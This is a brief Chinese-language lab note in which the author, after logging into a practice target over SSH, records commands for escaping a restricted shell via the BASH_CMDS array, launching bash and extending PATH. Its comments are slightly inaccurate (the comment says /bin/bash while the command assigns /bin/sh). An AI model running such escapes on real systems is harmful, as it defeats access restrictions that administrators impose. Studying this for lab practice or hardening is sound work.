小记如何绕过受限的shell

今天的靶场登录ssh后发现shell受限，以下

woami都执行不了，查看对应的bin目录，发现只能执行4个命令

在网上学到一招能够绕过这种受限制的被阉割的shell

BASH_CMDS[a]=/bin/sh;a    #把/bin/bash给a变量

/bin/bash                  

echo $0   #查看脚本自己的名字

echo $?    #命令执行结果反馈，0表明执行成功，其他数字表示不成功

export PATH=$PATH:/bin/    #将/bin 做为PATH环境变量导出

export PATH=$PATH:/usr/bin   #将/usr/bin做为PATH环境变量导出

执行完上面加粗的四步以后就能够执行全部命令了